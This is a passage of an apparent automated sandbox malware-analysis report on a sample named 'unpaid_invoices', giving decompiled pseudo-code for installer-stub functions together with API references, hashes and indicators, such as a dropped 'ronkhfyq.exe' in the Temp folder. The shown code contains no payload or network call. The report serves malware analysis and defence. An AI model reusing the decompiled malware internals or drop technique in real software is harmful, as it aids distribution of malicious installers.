              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: Global$AllocFree$CloseDeleteFileHandle
              • String ID:
              • API String ID: 2667972263-0
              • Opcode ID: 01061f3d3ca3a4d7c364cd067c19041a51f9a0b08810e1f4a161c9a0c4070a25
              • Instruction ID: ec4356a3eb6c7711b506d5a245a30aad41ccfdb787a60eec272099fea1c037c4
              • Opcode Fuzzy Hash: 01061f3d3ca3a4d7c364cd067c19041a51f9a0b08810e1f4a161c9a0c4070a25
              • Instruction Fuzzy Hash: D431C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E1CB798D419B98
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
              Download Yara Rule
              C-Code - Quality: 48%
              			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004064DB(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406A3B(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












              0x00402eb4
              0x00402ebd
              0x00402ec6
              0x00402ed2
              0x00402edb
              0x00402ee5
              0x00402f0a
              0x00402f10
              0x00402f15
              0x00402f16
              0x00402f46
              0x00402f1f
              0x00402f21
              0x00402f71
              0x00402f74
              0x00000000
              0x00402f7a
              0x00402f30
              0x00402f35
              0x00402f37
              0x00000000
              0x00000000
              0x00402f3f
              0x00402f44
              0x00402f45
              0x00402f45
              0x00402f52
              0x00402f5a
              0x00402f61
              0x00000000
              0x00402f8a
              0x00000000
              0x00402f69
              0x00402ef5
              0x00402f08
              0x00000000
              0x00000000
              0x00000000
              0x00402f08
              0x00402f90

              APIs
              • RegEnumValueW.ADVAPI32 ref: 00402EFD
              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: CloseEnum$DeleteValue
              • String ID:
              • API String ID: 1354259210-0
              • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
              • Instruction ID: e84adf69fee3246f56ef13a6fd4e717e0861f51d99737fac189c4d1833cff19f
              • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
              • Instruction Fuzzy Hash: 31213B7150010ABBDF11AF90CE89EEF7B7DEB54384F110076F909B21E0D7B59E54AA68
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
              Download Yara Rule
              C-Code - Quality: 77%
              			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x7a8aa0,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E004065B5();
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











              0x00401d81
              0x00401d85
              0x00401d9a
              0x00401d87
              0x00401d89
              0x00401d8f
              0x00401d8f
              0x00401da0
              0x00401da3
              0x00401dad
              0x00401db0
              0x00401db8
              0x00401dc9
              0x00401dcc
              0x00401dd7
              0x00401dce
              0x00401dd0
              0x00401dd0
              0x00401ddb
              0x00401de5
              0x00401e0c
              0x00401e1b
              0x00401e29
              0x00401e31
              0x00401e39
              0x00401e39
              0x00401e42
              0x00401e48
              0x00402ba4
              0x00402ba4
              0x00402c2d
              0x00402c39

              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
              • String ID:
              • API String ID: 1849352358-0
              • Opcode ID: f665995d6bdb305172d13ad54de642187c856862005d3c57e5c2f614b82d9191
              • Instruction ID: 474cd979728561ffe20026c9632071baa6ad0bc9fd2f813aa8d1396f3614d648
              • Opcode Fuzzy Hash: f665995d6bdb305172d13ad54de642187c856862005d3c57e5c2f614b82d9191
              • Instruction Fuzzy Hash: DC212672D00119AFCF05CBA4DE45AEEBBB5EF08304F14403AF945F62A0DB389951DB98
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
              Download Yara Rule
              C-Code - Quality: 73%
              			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce08 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce0f = 1;
				 *0x40ce0c = _t15 & 0x00000001;
				 *0x40ce0d = _t15 & 0x00000002;
				 *0x40ce0e = _t15 & 0x00000004;
				E004066AB(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf8);
				_push(_t18);
				_push(_t31);
				E004065B5();
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











              0x00401e4e
              0x00401e59
              0x00401e5b
              0x00401e68
              0x00401e7f
              0x00401e84
              0x00401e91
              0x00401e96
              0x00401e9a
              0x00401ea5
              0x00401eac
              0x00401ebe
              0x00401ec4
              0x00401ec9
              0x00401ed3
              0x00402638
              0x0040156d
              0x00402ba4
              0x00402c2d
              0x00402c39

              APIs
              • GetDC.USER32(?), ref: 00401E51
              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
              • ReleaseDC.USER32 ref: 00401E84
                • Part of subcall function 004066AB: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,\Microsoft\Internet Explorer\Quick Launch), ref: 00406850
                • Part of subcall function 004066AB: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
              • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
              • String ID:
              • API String ID: 2584051700-0
              • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
              • Instruction ID: c4fbce1732c038d4ae3387388930f25584bd8a0c3a5059ecf0713bcf7412b626
              • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
              • Instruction Fuzzy Hash: 0E01B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
              Download Yara Rule
              C-Code - Quality: 59%
              			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E004065B5();
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















              0x00401c43
              0x00401c45
              0x00401c4c
              0x00401c4f
              0x00401c52
              0x00401c5c
              0x00401c60
              0x00401c63
              0x00401c6c
              0x00401c6c
              0x00401c6f
              0x00401c73
              0x00401c7c
              0x00401c7c
              0x00401c7f
              0x00401c83
              0x00401c85
              0x00401cda
              0x00401cdc
              0x00401ce7
              0x00401cf1
              0x00401cf4
              0x00401cf4
              0x00401cfd
              0x00000000
              0x00401c87
              0x00401c8e
              0x00401c90
              0x00401c93
              0x00401c99
              0x00401ca0
              0x00401ca3
              0x00401ccb
              0x00401d03
              0x00401d03
              0x00401ca5
              0x00401cb3
              0x00401cbb
              0x00401cbe
              0x00401cbe
              0x00401ca3
              0x00401d06
              0x00401d09
              0x00401d0f
              0x00402ba4
              0x00402ba4
              0x00402c2d
              0x00402c39

              APIs
              • SendMessageTimeoutW.USER32 ref: 00401CB3
              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: MessageSend$Timeout
              • String ID: !
              • API String ID: 1777923405-2657877971
              • Opcode ID: a925d33b65f5538ff345f0f48edbd750304bc8babfa6be52d46d5660b496d1e6
              • Instruction ID: a8e9040b9442a73e8ccf438a9e221504da771f110143023329da3593775932a3
              • Opcode Fuzzy Hash: a925d33b65f5538ff345f0f48edbd750304bc8babfa6be52d46d5660b496d1e6
              • Instruction Fuzzy Hash: 2D219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00404E77 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
              Download Yara Rule
              C-Code - Quality: 77%
              			E00404E77(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004066AB(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004066AB(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004066AB(_t44, _t50, 0x7a1f88, 0x7a1f88, _a8);
				wsprintfW(_t34 + lstrlenW(0x7a1f88) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x7a7a78, _a4, 0x7a1f88);
			}



















              0x00404e80
              0x00404e85
              0x00404e8d
              0x00404e8e
              0x00404e9b
              0x00404ea3
              0x00404ea4
              0x00404ea6
              0x00404ea8
              0x00404eaa
              0x00404ead
              0x00404ead
              0x00404eb4
              0x00404eba
              0x00404eba
              0x00404ec1
              0x00404ec8
              0x00404ecb
              0x00404ece
              0x00404ece
              0x00404ed2
              0x00404ee2
              0x00404ee4
              0x00404ee7
              0x00404e90
              0x00404e90
              0x00404e97
              0x00404e97
              0x00404eef
              0x00404efa
              0x00404f10
              0x00404f21
              0x00404f3d

              APIs
              • lstrlenW.KERNEL32(007A1F88,007A1F88,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F18
              • wsprintfW.USER32 ref: 00404F21
              • SetDlgItemTextW.USER32 ref: 00404F34
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: ItemTextlstrlenwsprintf
              • String ID: %u.%u%s%s
              • API String ID: 3540041739-3551169577
              • Opcode ID: 4298df8fa65d3e63540fdf60f99430adbe5e40f9a8b71c27c1b7671c68856ea4
              • Instruction ID: f4f79be78f3b00f65903d53a5db5cb29a0acdec533a94133042e7cdde7caf59d
              • Opcode Fuzzy Hash: 4298df8fa65d3e63540fdf60f99430adbe5e40f9a8b71c27c1b7671c68856ea4
              • Instruction Fuzzy Hash: 5711D5736041282BDB00A56DDD45E9F3288AB81334F250637FA25F21D1EA79882186E8
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405F3D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
              Download Yara Rule
              C-Code - Quality: 58%
              			E00405F3D(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




              0x00405f3e
              0x00405f4b
              0x00405f4c
              0x00405f57
              0x00405f5f
              0x00405f5f
              0x00405f67

              APIs
              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405F43
              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405F4D
              • lstrcatW.KERNEL32(?,0040A014), ref: 00405F5F
              Strings
              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F3D
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: CharPrevlstrcatlstrlen
              • String ID: C:\Users\user\AppData\Local\Temp\
              • API String ID: 2659869361-3081826266
              • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
              • Instruction ID: 4d139d42d978cba7810d0072a9498665e67a0d594e33c17037060be18c5eefd9
              • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
              • Instruction Fuzzy Hash: F6D0A771101A306EC1117B648C04CDF729CEE89344346443BF901B70A0CB7D1D5287FD
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405644 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
              Download Yara Rule
              C-Code - Quality: 89%
              			E00405644(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x7a1f74 != _t16) {
							_push(_t16);
							_push(6);
							 *0x7a1f74 = _t16;
							E00405005();
						}
						L11:
						return CallWindowProcW( *0x7a1f7c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404F85(_a4, 1);
